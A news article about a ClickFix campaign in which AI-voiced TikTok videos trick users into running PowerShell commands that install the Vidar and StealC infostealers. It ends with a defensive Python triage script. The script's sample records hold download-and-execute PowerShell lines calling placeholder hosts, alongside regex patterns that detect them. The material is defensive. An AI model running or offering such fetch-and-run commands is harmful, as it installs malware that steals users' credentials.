AI-generated TikTok videos are trying to steal your data

Trend Micro researchers are warning TikTok users: some AI-generated videos on the platform are being used in ClickFix cyberattacks. This type of attack relies on manipulating users. Cybercriminals persuade their victims to perform the risky actions themselves, which allows the attackers to bypass security systems. ClickFix attacks are increasingly widespread in the criminal world. They have notably become a key tool of the North Korean hacking group Lazarus, which specializes in cryptocurrency theft.

Videos with AI-generated voices

In the scenario revealed by Trend Micro, the videos encourage users to execute commands that are supposed to activate Windows and Microsoft Office, or to unlock exclusive features in popular software such as Spotify. Eager to activate functions without paying, users follow the instructions in the videos. Experts say these are PowerShell commands. PowerShell is the command-line tool built into Windows that allows you to control, configure, or diagnose a computer. All the videos are "very similar" and have "only minor differences in camera angles and download URLs" embedded in the command lines. All the clips feature a robotic voice generated by artificial intelligence. These robotic voices have become ubiquitous on social media in recent months.

As the Trend Micro report explains, cybercriminals are using TikTok to reach a large number of Internet users. Some of the malicious videos have reached "more than half a million views." They also generate a lot of engagement. A video promising to help you improve Spotify has accumulated more than 20,000 likes and more than 100 comments. The campaign videos were uploaded by several different accounts. These are no longer active on TikTok, Trend Micro points out.

Sensitive Data Theft on Windows

Unfortunately for Internet users, the commands shown in the videos do not activate anything. Instead, they remotely download, install, and execute a malicious script on the computer. This script is programmed to install malware on the machine, particularly infostealers. This type of malware specializes in stealing information, such as passwords, logins, or banking details.

The malware used by the hackers includes Vidar and StealC. Vidar, for example, is capable of taking screenshots without users' knowledge and harvesting credit card numbers. StealC, on the other hand, focuses on information stored by the web browser, which puts cookies and login identifiers at risk. In either case, the stolen data puts Internet users at risk.

We therefore recommend that you be wary of AI-generated videos that are rife on TikTok. If they offer to run PowerShell commands on your computer, take the time to learn about how they work and their purpose. In any case, do not type the commands without knowing what you are doing. You could be giving control of your computer to a cybercriminal.
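For defenders, the download-and-run behaviour described above can be hunted in process-creation logs. The following is an added example, not code from Trend Micro or from this article: the record fields, hosts and URLs are constructed placeholders, and since the article does not reproduce the actual commands, the matched cmdlet names (standard PowerShell download and execution cmdlets and their aliases) are an assumption about what such a command line contains.

```python
import re

# Constructed process-creation records (fields modelled on what Sysmon
# Event ID 1 or Security 4688 expose); hosts and URLs are placeholders.
SAMPLE_EVENTS = [
    {"host": "pc-01", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell -c "iex (irm https://activate.example.invalid/fix.ps1)"'},
    {"host": "pc-02", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell -c "Invoke-WebRequest https://example.invalid/r.csv -OutFile r.csv"'},
    {"host": "pc-03", "image": "powershell.exe", "parent": "services.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    {"host": "pc-04", "image": "pwsh.exe", "parent": "explorer.exe",
     "cmdline": "pwsh -c \"(New-Object Net.WebClient).DownloadString("
                "'http://example.invalid/a') | Invoke-Expression\""},
]

# Fetching remote content (assumed patterns, see lead-in).
DOWNLOAD = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b|downloadstring", re.I)
# Running a string as code without writing it to disk first.
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\"\)]+", re.I)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}


def triage(events):
    """Return findings for PowerShell launches that fetch and run remote code."""
    findings = []
    for ev in events:
        if ev["image"].lower() not in POWERSHELL_IMAGES:
            continue
        cmd = ev["cmdline"]
        # A download alone (pc-02) or a local script (pc-03) is not flagged;
        # the signal is download and in-memory execution in one command line.
        if not (DOWNLOAD.search(cmd) and EXECUTE.search(cmd)):
            continue
        findings.append({
            "host": ev["host"],
            "urls": URL.findall(cmd),
            # A shell started from the desktop suggests the user typed or pasted it.
            "user_initiated": ev["parent"].lower() in INTERACTIVE_PARENTS,
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The extracted URLs give responders something to block and to search for on other hosts, and the `user_initiated` flag separates a pasted command from one launched by a service or scheduled job.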

Source: Trend Micro
